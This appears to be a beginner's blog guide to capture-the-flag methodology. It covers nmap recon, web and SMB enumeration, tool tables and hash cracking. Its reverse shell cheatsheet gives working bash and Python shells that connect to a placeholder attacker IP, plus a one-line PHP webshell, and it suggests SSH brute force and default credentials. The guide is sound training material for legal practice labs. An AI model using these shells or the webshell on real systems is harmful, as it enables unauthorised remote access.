← Back to home
CTF HackTheBox TryHackMe Metodología Web Pwn Forense
Basic

CTF Methodology: Complete Beginner's Guide

Oct 1, 2024

CTF (Capture The Flag) competitions are cybersecurity events where you find "flags" (secret strings) by solving technical challenges. They are the best legal way to practise ethical hacking. This guide covers methodology, common categories, and essential tools.

1. Recommended Practice Platforms

# Guided rooms — best for beginners:
# https://tryhackme.com
# https://picoctf.org

# Solo machines — intermediate/advanced:
# https://hackthebox.com
# https://vulnhub.com
# https://pwn.college   (binary exploitation)

# Live competitions:
# https://ctftime.org   (global CTF calendar)

2. General Methodology for Machines (HTB/THM)

# Step 1 — Initial recon:
export IP=10.10.10.X
nmap -sV -sC -T4 $IP
nmap -p- --min-rate 5000 $IP

# Step 2 — Enumerate services by port:
# Port 80/443 → Web enumeration
# Port 21  → FTP (try anonymous login)
# Port 22  → SSH (brute force if username known)
# Port 445 → SMB (enum4linux, smbclient)

# Step 3 — Gain initial foothold
# Step 4 — Privilege escalation to root/system
# Step 5 — Capture flags: user.txt and root.txt

3. Web Enumeration (Most Common Category)

# Basic recon:
whatweb http://$IP
curl -I http://$IP
nikto -h http://$IP

# Directory and file discovery:
gobuster dir -u http://$IP \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,html,txt,bak -t 50

# Subdomain discovery:
echo "$IP  target.htb" | sudo tee -a /etc/hosts
gobuster dns -d target.htb \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Manual checks:
# View source (Ctrl+U)
# Check /robots.txt, /sitemap.xml, /.git/, /backup/
# Try default creds: admin/admin, admin/password

4. SMB Enumeration (Windows)

# Enumerate with enum4linux-ng:
enum4linux-ng -A $IP

# List shares:
smbclient -L //$IP -N
smbclient //$IP/SHARE -N

# With crackmapexec:
crackmapexec smb $IP --shares -u '' -p ''

# Mount share locally:
sudo mount -t cifs //$IP/Data /mnt/smb -o username=,password=

5. Reverse Shells Cheatsheet

# Listen on attacker machine:
nc -lvnp 4444
rlwrap nc -lvnp 4444    # With command history

# Bash reverse shell:
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

# Python:
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# PHP webshell (RCE):
<?php system($_GET["cmd"]); ?>

# Upgrade basic shell to full TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

6. CTF Categories & Tools

CategoryDescriptionKey Tools
WebSQLi, XSS, IDOR, SSRF, path traversalBurp Suite, sqlmap, ffuf
CryptographyClassic ciphers, weak RSA, hash crackingCyberChef, john, hashcat
ReversingBinary analysis, decompilationGhidra, IDA Free, radare2
Pwn/BinaryBuffer overflow, ret2libc, ROP chainspwntools, gdb-peda, ROPgadget
ForensicsDisk images, network captures, memoryVolatility, Autopsy, Wireshark
OSINTPassive recon, social mediatheHarvester, Shodan, Maltego
SteganographyHidden data in images/audiosteghide, stegseek, zsteg

7. CTF Tips & Best Practices

# Always take notes:
mkdir ~/ctf/machine && cd ~/ctf/machine
nano notes.md

# Find flags (Linux):
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

# CyberChef for suspicious strings:
# https://gchq.github.io/CyberChef/
# Useful for: base64, hex, ROT13, URL encode, JWT...

# Identify hash type:
hash-identifier "5f4dcc3b5aa765d61d8327deb882cf99"
hashid "5f4dcc3b5aa765d61d8327deb882cf99"

# Crack hashes:
echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt